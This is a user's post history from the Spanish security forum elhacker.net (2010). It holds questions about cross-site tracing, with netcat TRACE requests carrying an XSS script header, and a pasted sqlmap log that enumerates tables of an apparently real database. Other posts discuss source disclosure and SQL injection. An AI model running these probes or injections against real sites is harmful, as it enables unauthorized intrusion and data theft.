elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1]
1  Foros Generales / Dudas Generales / Como realizar un XST mediante TRACE en: 31 Diciembre 2010, 00:52 am
Hola
Les cuento lo suguiente
he realizado bastantes escaneos con nikto (excelente herramienta)
la mayoria de las veces las paginas son vulnerables a XST
he leido como realizar este metodo HTTP, pero no se como ver si verdaderamente resulta
haci lo hago

$ nc -v www.ejemplo.com 80
Connection to www.ejemplo.com 80 port [tcp/www] succeeded!
OPTIONS / HTTP/1.O

...
Allow: GET,HEAD,POST,OPTIONS,TRACE
...

Bueno aca nos dice que la opcion TRACE esta habiilitada
ahora, en la pagina busco un search.php o algo haci

$ nc -v www.ejemplo.com 80
TRACE /buscar.php HTTTP/1.0
Host:www.ejemplo.com
XSS:<script>alert('test')</script>


...
...
...
TRACE /buscar.php HTTTP/1.0
Host:www.ejemplo.com
XSS:<script>alert('test')</script>

Ahora en la pagina noce que hacer para ver si verdaderamente resulto
el XST mediante TRACE.
Definición XST: http://en.wikipedia.org/wiki/Cross-site_tracing
SAludos
Gracias por las respuestas
2  Seguridad Informática / Nivel Web / Re: La Defensoría del Pueblo - República de Colombia [Full Source Disclosure] en: 18 Diciembre 2010, 01:42 am
Buenas
Tienes un buen blog, no sabia que era tuyo xd

Con respecto al tema los FSD los haces manual o ocupas algun programa ?
yo e descubierto varios FSD en paginas de mi pais , pero me quedo hay una pregunta ¿ como saber si la conexión del servidor Mysql o otra DB es local o remota.. ?
con respecto a este tema sabes podria leer o bajar algo.
Mucas gracias :D
3  Seguridad Informática / Nivel Web / Re: Ayuda con Sqlmap en: 14 Diciembre 2010, 19:39 pm
Esta dificil me manda un error

[15:34:17] [INFO] retrieved: 14
[15:36:03] [INFO] performed 20 queries in 105 seconds
[15:36:03] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) AND name NOT IN (SELECT TOP 0 name FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY name ASC) ORDER BY name ASC
[15:36:03] [INFO] retrieved: [15:36:04] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request

Avisa si lo has solucionado
Saludos
4  Seguridad Informática / Nivel Web / Re: Insertar imagenes en Inyección SQL en: 2 Diciembre 2010, 04:38 am
Tu pregunta sería como subir una imagen desde el panel de administrador
Saludos
5  Seguridad Informática / Bugs y Exploits / Re: Google.com vulnerable to XSS (HTML Code Injection) en: 2 Diciembre 2010, 04:17 am
Muy bueno =) saludos
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines